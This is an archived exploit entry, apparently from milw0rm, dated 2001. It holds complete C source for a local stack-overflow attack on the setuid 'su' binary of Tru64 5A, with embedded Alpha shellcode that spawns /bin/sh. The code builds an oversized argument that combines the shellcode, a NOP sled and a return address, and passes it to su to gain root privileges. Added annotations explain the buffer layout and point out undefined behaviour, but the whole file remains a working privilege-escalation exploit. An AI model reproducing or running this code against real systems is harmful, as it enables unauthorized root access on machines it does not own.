"Tru64 5 - 'su' Env Local Stack Overflow"

Author

Exploit author

K2

Platform

Exploit platform

tru64

Release date

Exploit published date

2001-01-26

/*      Copyright (c) 2000 ADM                                  */
/*      All Rights Reserved                                     */
/*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
/*      The copyright notice above does not evidence any        */
/*      actual or intended publication of such source code.     */
/*                                                              */
/*      Title:        Tru64 5 su                                */
/*      Tested under: Tru64 5A  (OSF/1)                         */
/*      By:           K2  (thx horizon,lamont :)                */
/*      Use:          cc -o tru64-su tru64-su.c                 */
/*      Issues:       Tru64 re-implemented non-exec patch,      */
/*                    I'm working on non-exec alpha technique   */
/*                    so it will only work if,                  */
/*                    do this -> "sysconfig -q proc executable_stack" */
/*                    and see if -> "executable_stack = 1"      */
/*                    else?                                     */
/*                    wait for new alpha non-exec stack exploit */
/*                                                              */


#include <unistd.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>
#include <stdio.h>

#define BUFSIZE 8241
/* 4-byte pattern that main() repeats as filler (nop[i % 4]). */
char *nop                               = "\x1f\x04\xff\x47";
/* 8 bytes that main() copies into buf[BUFSIZE-8 .. BUFSIZE-1]. This points
 * at a string literal, yet main() writes through it (retaddr[0] += ...)
 * when argv[1] is given; modifying a string literal is undefined behaviour
 * in C, as literals may live in read-only storage. */
char *retaddr                   = "\xe4\xc0\xff\x1f\x01\x00\x00\x00";

/* lamont's shellcode */

/* 20 32-bit words (80 bytes). main() aliases this array as char
 * (rc = (char *)rawcode) and copies it into buf byte by byte, so the
 * byte order that ends up in buf follows the host's endianness. The
 * trailing comments are the author's Alpha mnemonics; the "[2000]" tags
 * are theirs as well. */
int rawcode[] = {
  0x2230fec4,              /* subq $16,0x13c,$17 [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0x42509532,              /* subq $18, 0x84     [2000]*/
  0x239fffff,              /* xor $18, 0xffffffff, $18 */
  0x4b84169c,
  0x465c0812,
  0xb2510134,              /* stl $18, 0x134($17)[2000]*/
  0x265cff98,              /* lda $18, 0xff978cd0[2000]*/
  0x22528cd1,
  0x465c0812,              /* xor $18, 0xffffffff, $18 */
  0xb2510140,              /* stl $18, 0x140($17)[2000]*/
  0xb6110148,              /* stq $16,0x148($17) [2000]*/
  0xb7f10150,              /* stq $31,0x150($17) [2000]*/
  0x22310148,              /* addq $17,0x148,$17 [2000]*/
  0x225f013a,              /* ldil $18,0x13a     [2000]*/
  0x425ff520,              /* subq $18,0xff,$0   [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0xffffffff,              /* call_pal 0x83      [2000]*/
  0xd21fffed,              /* bsr $16,$l1    ENTRY     */
  0x6e69622f,              /* .ascii "/bin"      [2000]*/
  /* .ascii "/sh\0" is generated */
};

/*
 * Builds an ~8 KiB string in buf and executes /usr/bin/su with it as
 * argv[1]. Layout of buf as written below: a 408-byte prefix (8 x 0x6e,
 * the first 72 bytes of rawcode, 320 bytes of the 4-byte nop pattern,
 * then the last 8 bytes of rawcode with byte 72 reduced by 80), 'A'
 * filler up to offset BUFSIZE-8, then the 8 bytes of retaddr. The first
 * 0x00 byte in buf is the one inside retaddr, which terminates the
 * string; buf[BUFSIZE .. BUFSIZE+3] are never written.
 *
 * argv[1], if present, is parsed with atoi() (no error reporting;
 * non-numeric input yields 0) and added to retaddr[0].
 *
 * Returns 0. execle() only returns on failure, and that case is neither
 * checked nor reported.
 */
int main(int argc, char **argv)
{
  char buf[BUFSIZE+4];
  char *env[2];            /* env[0] is never assigned (see below) */
  char *cp,*rc;
  int i;

  /* retaddr points at a string literal; writing through it is undefined
   * behaviour in C (literals may live in read-only storage). */
  if(argc > 1) retaddr[0]+=atoi(argv[1]);

  /* Fill bytes [0, BUFSIZE-8) with 'A'. &buf has type char (*)[BUFSIZE+4];
   * memset takes void * so this compiles, but plain `buf` is the idiom. */
  memset(&buf,'A',BUFSIZE-8);
  cp=(char *) &(buf[BUFSIZE-8]);

  /* Bytes [BUFSIZE-8, BUFSIZE): the raw bytes of retaddr, including its
   * 0x00 bytes, so the string ends here. */
  for (i=0;i<8;i++)
    *cp++=retaddr[i];

  /* Now overwrite the start of buf. rc aliases rawcode as bytes, so the
   * byte order written depends on the host's endianness. */
  rc=(char *)rawcode;
  cp=buf;

  for(i=0;i<8;i++)
    *cp++ = 0x6e;

  /* First 72 bytes of rawcode (18 words). */
  for(i=0;i<72;i++)
    *cp++ = rc[i];
  /* 320 bytes: the 4-byte nop pattern repeated 80 times. */
  for(i=0;i<320;i++)
    *cp++ = nop[i % 4];
  /* Last 8 bytes of rawcode; byte 72 is lowered by 80 (char arithmetic,
   * the result is truncated back to char on store). */
  *cp++=rc[72]-80;
  for(i=1;i<8;i++)
    *cp++ = rc[i+72];

  /* Only env[1] is set; env[0] is an indeterminate pointer, so the
   * environment handed to execle reads uninitialized memory. */
  env[1]=NULL;

  /* Replaces this process image. On failure execle returns -1 with errno
   * set; neither is examined before returning 0. */
  execle("/usr/bin/su","su",buf, NULL,env);
  return(0);
}


// milw0rm.com [2001-01-26]